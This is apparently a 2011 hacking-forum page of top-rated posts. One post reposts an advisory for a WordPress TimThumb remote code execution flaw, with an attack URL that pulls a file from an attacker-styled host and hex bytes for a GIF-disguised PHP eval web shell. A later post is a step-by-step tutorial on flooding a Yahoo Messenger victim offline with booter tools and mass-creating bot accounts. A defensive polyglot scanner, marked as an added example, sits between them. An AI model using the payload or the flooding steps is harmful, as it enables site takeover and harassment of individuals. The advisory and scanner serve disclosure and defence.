Leaderboard

Popular Content

Showing content with the highest reputation on 08/05/11 in all areas

  1. A must-watch.. I hope it weeds out some of the fools who believe in bullshit.
    1 point
  2. Send me a PM with an email address
    1 point
  3. # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
     # Date: 3rd August 2011
     # Author: MaXe
     # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
     # Version: 1.32
     # Screenshot: See attachment
     # Tested on: Windows XP + Apache + PHP (XAMPP)

     WordPress TimThumb (Theme) Plugin - Remote Code Execution

     Versions Affected: 1.* - 1.32
     (Only version 1.19 and 1.32 were tested.)
     (Version 1.33 did not save the cache file as .php)

     Info: (See references for original advisory)
     TimThumb is an image resizing utility, widely used in many WordPress themes.

     Links:
     http://www.binarymoon.co.uk/projects/timthumb/
     http://code.google.com/p/timthumb/

     Credits:
     - Mark Maunder (Original Researcher)
     - MaXe (Independent Proof of Concept Writer)

     -:: The Advisory ::-
     TimThumb is prone to a Remote Code Execution vulnerability, because the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.

     Attack URL: (Note! Some websites use Base64 Encoding of the src GET-request.)
     http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

     Stored file on the Target: (This can change from host to host.)
     1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
     1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
     md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

     PoC File:
     \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
     \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
     \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
     \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
     \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
     \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
     (Transparent GIF + <?php @eval($_GET['cmd']) ?>)

     -:: Solution ::-
     Update to the latest version 1.34 or delete the timthumb file.
     NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.)
     find . | grep php | xargs grep -s timthumb

     Disclosure Information:
     - Vulnerability Disclosed (Mark Maunder): 1st August 2011
     - Vulnerability Researched (MaXe): 2nd August 2011
     - Disclosed at The Exploit Database: 3rd August 2011

     References:
     http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
     http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
     http://code.google.com/p/timthumb/issues/detail?id=212
     http://programming.arantius.com/the+smallest+possible+gif

     Source
    1 point
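
A defensive check for the cached-file pattern the advisory above describes, as an added example that is not part of the original post or of TimThumb: it sweeps a cache directory for files that begin with an image header yet contain a PHP open tag or are stored under an executable extension. The function names, file names and sample bytes are constructed for illustration.

```python
import os
import re
import tempfile

# Magic numbers of the image types an image resizer is expected to cache.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# Only the long open tag is matched; "<?=" is short enough to occur by
# chance in compressed image data and would produce false positives.
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def classify(data, name):
    """Return the reasons a cached file looks like an image/PHP polyglot."""
    reasons = []
    is_image = data.startswith(IMAGE_MAGIC)
    if is_image and PHP_TAG.search(data):
        reasons.append("image header followed by a PHP open tag")
    if is_image and name.lower().endswith((".php", ".phtml")):
        reasons.append("image content stored under an executable extension")
    return reasons


def scan_cache(root):
    """Walk root and map each suspicious file path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
            reasons = classify(data, name)
            if reasons:
                findings[path] = reasons
    return findings


def demo():
    """Constructed sample cache: one clean image, one polyglot."""
    with tempfile.TemporaryDirectory() as root:
        clean = b"GIF89a" + b"\x00" * 32 + b"\x3b"
        dirty = clean + b"<?php /* constructed marker, not a payload */ ?>"
        for name, body in (("a1b2.gif", clean), ("external_c3d4.php", dirty)):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return {os.path.basename(p): r for p, r in scan_cache(root).items()}
```

Point `scan_cache` at a theme's `cache` directory; any hit warrants checking whether the site still runs a TimThumb version older than the fixed release named in the advisory.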
  4. [+] I noticed that most of the new users who show up on the forum are looking for this, and I saw that there is another topic where everyone posts and nobody answers their questions, and on top of that the boots are no good, which makes them think the program is no good. So I will write this, let's call it a "tutorial", for the users who don't know what to do.
     [+] To begin with, we need an archive with a few "flooders" (they are the ones I use myself). The archive contains 3 folders:
     - Flooderi
     - IR IDMakerV3.2
     - Multi Yahoo Boots Checker
     Flooderi holds the programs, IR IDMaker V3.2 holds a program with which you could make boots very easily, and Multi Yahoo Boots Checker holds a program with which you can scan your list of boots, save the boots that still work and get rid of the ones that no longer work.
     [+] Go into Flooderi and open, one at a time, only:
     -Big Killer Release
     -Fusion Ym v2
     -GMC Booters
     Leave the other 2 there, because they don't work and I was too lazy to delete them..^^ In all 3 programs you will see that each of them shows Load. Click Load in each one in turn and select the .txt file in the Flooderi folder named dEv1L Boots buni. Do the same in all of them and then click log in in all of them. Wait a little for everything to load. It will take some time to load.. Not long. About 45 seconds. After the boots have loaded, put the ID in there at Victim and proceed as follows. In Big Killer Release click Flood, in Fusion Ym click Fast YM Flood, and in Gmc booters click Boot 1. Now the victim will be kicked off messenger. It doesn't take very long.. it depends on the speed of the connection.
     [+] That's about all there is to flooding someone.
     [+] To create boots, do the following: Go into the IR IDMakerV3.2 archive. Go into IR IDMaker. Once you are in it, tick:
     -Random Boot name
     -Randomize Name and Lastname
     -Randomize information
     And press the start button. Now the captcha code has appeared on the right, which you will have to type to the left of the Create button.. Each time after you type the code, press Create. And a boot will be created. Then click Save and you will be able to save the created boots wherever you want.
     [+] If my "tutorial" was helpful to you, press the REP button under my avatar. I hope I was of use to the new members who were looking for this.
    -1 points